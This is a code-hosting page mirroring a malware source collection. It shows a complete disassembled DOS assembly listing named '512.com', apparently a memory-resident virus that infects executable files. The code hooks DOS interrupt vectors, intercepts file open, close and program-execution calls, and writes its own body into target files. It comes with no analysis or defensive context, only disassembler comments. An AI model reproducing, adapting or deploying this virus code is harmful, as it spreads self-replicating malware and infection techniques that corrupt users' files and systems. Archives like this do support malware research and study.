mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-29 14:35:27 +00:00
4b9382ddbc
push
269 lines
8.8 KiB
NASM
269 lines
8.8 KiB
NASM
;PROGRAM NAME: 512.com
|
||
;-------------------------------------------------
|
||
H00100: MOV AH,30h
|
||
INT 21h ;DOS Version#
|
||
MOV SI,0004h
|
||
MOV DS,SI ;SEGMENT OPERATION
|
||
CMP Byte Ptr AH,1Eh
|
||
LDS AX,[SI+08h]
|
||
JB H0011B ; . . . . . . . . .
|
||
MOV AH,13h
|
||
INT 2Fh ;Print Spooler Ctrl
|
||
PUSH DS ;SEGMENT OPERATION
|
||
PUSH DX
|
||
INT 2Fh ;Print Spooler Ctrl
|
||
POP AX
|
||
POP DS ;SEGMENT OPERATION
|
||
H0011B: MOV DI,00F8h
|
||
STOSW
|
||
MOV AX,DS
|
||
STOSW
|
||
MOV DS,SI ;SEGMENT OPERATION
|
||
LDS AX,[SI+40h]
|
||
STOSW
|
||
CMP AX,0121h
|
||
MOV AX,DS
|
||
STOSW
|
||
PUSH ES ;SEGMENT OPERATION
|
||
PUSH DI
|
||
JNZ H00139 ; . . . . . . . . .
|
||
SHL Word Ptr SI,1
|
||
MOV CX,0100h
|
||
REPZ
|
||
CMPSW
|
||
H00139: PUSH CS ;SEGMENT OPERATION
|
||
POP DS ;SEGMENT OPERATION
|
||
JZ H00187 ; . . . . . . . . .
|
||
MOV AH,52h
|
||
INT 21h ;INDEF FUNCTION
|
||
PUSH ES ;SEGMENT OPERATION
|
||
MOV SI,00F8h
|
||
SUB DI,DI
|
||
LES AX,ES:[BX+12h]
|
||
MOV DX,ES:[DI+02h]
|
||
MOV CX,0104h
|
||
REPZ
|
||
MOVSW
|
||
MOV DS,CX ;SEGMENT OPERATION
|
||
MOV DI,0016h
|
||
MOV Word Ptr [DI+6E],0121h
|
||
MOV [DI+70h],ES
|
||
POP DS ;SEGMENT OPERATION
|
||
MOV [BX+14h],DX
|
||
MOV DX,CS
|
||
MOV DS,DX ;SEGMENT OPERATION
|
||
MOV BX,[DI-14h]
|
||
DEC Byte Ptr BH
|
||
MOV ES,BX ;SEGMENT OPERATION
|
||
CMP DX,[DI]
|
||
MOV DS,[DI] ;SEGMENT OPERATION
|
||
MOV DX,[DI]
|
||
DEC DX
|
||
MOV DS,DX ;SEGMENT OPERATION
|
||
MOV SI,CX
|
||
MOV DX,DI
|
||
MOV CL,08h
|
||
REPZ
|
||
MOVSW
|
||
MOV DS,BX ;SEGMENT OPERATION
|
||
JB H00197 ; . . . . . . . . .
|
||
INT 20h ;TERMINATE normally
|
||
;-------------------------------------------------
|
||
H00187: MOV SI,CX
|
||
MOV DS,[SI+2Ch] ;SEGMENT OPERATION
|
||
H0018C: LODSW ; . . . . . . . . .
|
||
DEC SI
|
||
TEST AX,AX
|
||
JNZ H0018C ; . . . . . . . . .
|
||
ADD Word Ptr SI,+03h
|
||
MOV DX,SI
|
||
H00197: MOV AH,3Dh
|
||
CALL H001B0 ; . . . . . . . . .
|
||
MOV DX,[DI]
|
||
MOV [DI+04h],DX
|
||
ADD [DI],CX
|
||
POP DX
|
||
PUSH DX
|
||
PUSH CS ;SEGMENT OPERATION
|
||
POP ES ;SEGMENT OPERATION
|
||
PUSH CS ;SEGMENT OPERATION
|
||
POP DS ;SEGMENT OPERATION
|
||
PUSH DS ;SEGMENT OPERATION
|
||
MOV AL,50h
|
||
PUSH AX
|
||
MOV AH,3Fh
|
||
RETF
|
||
;-------------------------------------------------
|
||
H001B0: INT 21h ;INDEF FUNCTION
|
||
JB H001CD ; . . . . . . . . .
|
||
MOV BX,AX
|
||
H001B6: PUSH BX
|
||
MOV AX,1220h
|
||
INT 2Fh ;Print Spooler Ctrl
|
||
MOV BL,ES:[DI]
|
||
MOV AX,1216h
|
||
INT 2Fh ;Print Spooler Ctrl
|
||
POP BX
|
||
PUSH ES ;SEGMENT OPERATION
|
||
POP DS ;SEGMENT OPERATION
|
||
ADD Word Ptr DI,+11h
|
||
MOV CX,0200h
|
||
H001CD: RET
|
||
;-------------------------------------------------
|
||
H001CE: STI
|
||
PUSH ES ;SEGMENT OPERATION
|
||
PUSH SI
|
||
PUSH DI
|
||
PUSH BP
|
||
PUSH DS ;SEGMENT OPERATION
|
||
PUSH CX
|
||
CALL H001B6 ; . . . . . . . . .
|
||
MOV BP,CX
|
||
MOV SI,[DI+04h]
|
||
POP CX
|
||
POP DS ;SEGMENT OPERATION
|
||
CALL H00211 ; . . . . . . . . .
|
||
JB H0020A ; . . . . . . . . .
|
||
CMP SI,BP
|
||
JNB H0020A ; . . . . . . . . .
|
||
PUSH AX
|
||
MOV AL,ES:[DI-04h]
|
||
NOT Byte Ptr AL
|
||
AND AL,1Fh
|
||
JNZ H00209 ; . . . . . . . . .
|
||
ADD SI,ES:[DI]
|
||
XCHG SI,ES:[DI+04h]
|
||
ADD ES:[DI],BP ;SEGMENT OPERATION
|
||
CALL H00211 ; . . . . . . . . .
|
||
MOV ES:[DI+04h],SI ;SEGMENT OPERATION
|
||
LAHF
|
||
SUB ES:[DI],BP ;SEGMENT OPERATION
|
||
SAHF
|
||
H00209: POP AX
|
||
H0020A: POP BP
|
||
POP DI
|
||
POP SI
|
||
POP ES ;SEGMENT OPERATION
|
||
RETF 0002h
|
||
;-------------------------------------------------
|
||
H00211: MOV AH,3Fh
|
||
H00213: PUSHF
|
||
PUSH CS ;SEGMENT OPERATION
|
||
CALL H0023A ; . . . . . . . . .
|
||
RET
|
||
;-------------------------------------------------
|
||
CMP Byte Ptr AH,3Fh
|
||
JZ H001CE ; . . . . . . . . .
|
||
PUSH DS ;SEGMENT OPERATION
|
||
PUSH ES ;SEGMENT OPERATION
|
||
PUSH AX
|
||
PUSH BX
|
||
PUSH CX
|
||
PUSH DX
|
||
PUSH SI
|
||
PUSH DI
|
||
CMP Byte Ptr AH,3Eh
|
||
JZ H0023F ; . . . . . . . . .
|
||
CMP AX,4B00h
|
||
MOV AH,3Dh
|
||
JZ H00241 ; . . . . . . . . .
|
||
H00232: POP DI
|
||
POP SI
|
||
POP DX
|
||
POP CX
|
||
POP BX
|
||
POP AX
|
||
POP ES ;SEGMENT OPERATION
|
||
POP DS ;SEGMENT OPERATION
|
||
H0023A: JMP Far CS:[H00004h]
|
||
;-------------------------------------------------
|
||
H0023F: MOV AH,45h
|
||
H00241: CALL H001B0 ; . . . . . . . . .
|
||
JB H00232 ; . . . . . . . . .
|
||
SUB AX,AX
|
||
MOV [DI+04h],AX
|
||
MOV Byte Ptr [DI-0Fh],02h
|
||
CLD
|
||
MOV DS,AX ;SEGMENT OPERATION
|
||
MOV SI,004Ch
|
||
LODSW ; . . . . . . . . .
|
||
PUSH AX
|
||
LODSW ; . . . . . . . . .
|
||
PUSH AX
|
||
PUSH [SI+40h]
|
||
PUSH [SI+42h]
|
||
LDS DX,CS:[SI-50h]
|
||
MOV AX,2513h
|
||
INT 21h ;Set Intrpt Vector
|
||
PUSH CS ;SEGMENT OPERATION
|
||
POP DS ;SEGMENT OPERATION
|
||
MOV DX,0204h
|
||
MOV AL,24h
|
||
INT 21h ;Write Random Rcds
|
||
PUSH ES ;SEGMENT OPERATION
|
||
POP DS ;SEGMENT OPERATION
|
||
MOV AL,[DI-04h]
|
||
AND AL,1Fh
|
||
CMP AL,1Fh
|
||
JZ H00284 ; . . . . . . . . .
|
||
MOV AX,[DI+17h]
|
||
SUB AX,4F43h
|
||
JNZ H002C3 ; . . . . . . . . .
|
||
H00284: XOR [DI-04h],AL
|
||
MOV AX,[DI]
|
||
CMP AX,CX
|
||
JB H002C3 ; . . . . . . . . .
|
||
ADD AX,CX
|
||
JB H002C3 ; . . . . . . . . .
|
||
TEST Byte Ptr [DI-0Dh],04h
|
||
JNZ H002C3 ; . . . . . . . . .
|
||
LDS SI,[DI-0Ah]
|
||
DEC AX
|
||
SHR Byte Ptr AH,1
|
||
AND AH,[SI+04h]
|
||
JZ H002C3 ; . . . . . . . . .
|
||
MOV AX,0020h
|
||
MOV DS,AX ;SEGMENT OPERATION
|
||
SUB DX,DX
|
||
CALL H00211 ; . . . . . . . . .
|
||
MOV SI,DX
|
||
PUSH CX
|
||
H002AF: LODSB ; . . . . . . . . .
|
||
CMP AL,CS:[SI+07h]
|
||
JNZ H002DD ; . . . . . . . . .
|
||
LOOP H002AF ; . . . . . . . . .
|
||
POP CX
|
||
H002B9: OR Byte Ptr ES:[DI-04h],1Fh
|
||
H002BE: OR Byte Ptr ES:[DI-0Bh],40h
|
||
H002C3: MOV AH,3Eh
|
||
CALL H00213 ; . . . . . . . . .
|
||
OR Byte Ptr ES:[DI-0Ch],40h
|
||
POP DS ;SEGMENT OPERATION
|
||
POP DX
|
||
MOV AX,2524h
|
||
INT 21h ;Set Intrpt Vector
|
||
POP DS ;SEGMENT OPERATION
|
||
POP DX
|
||
MOV AL,13h
|
||
INT 21h ;Write Random Rcds
|
||
JMP H00232
|
||
;-------------------------------------------------
|
||
H002DD: POP CX
|
||
MOV SI,ES:[DI]
|
||
MOV ES:[DI+04h],SI ;SEGMENT OPERATION
|
||
MOV AH,40h
|
||
INT 21h ;Write File/Device
|
||
JB H002BE ; . . . . . . . . .
|
||
MOV ES:[DI],SI ;SEGMENT OPERATION
|
||
MOV ES:[DI+04h],DX ;SEGMENT OPERATION
|
||
PUSH CS ;SEGMENT OPERATION
|
||
POP DS ;SEGMENT OPERATION
|
||
MOV DL,08h
|
||
MOV AH,40h
|
||
INT 21h ;Write File/Device
|
||
JMP Short H002B9
|
||
;-------------------------------------------------
|
||
IRET
|
||
;-------------------------------------------------
|
||
ADD SS:[BX+SI],AL ;SEGMENT OPERATION
|
||
|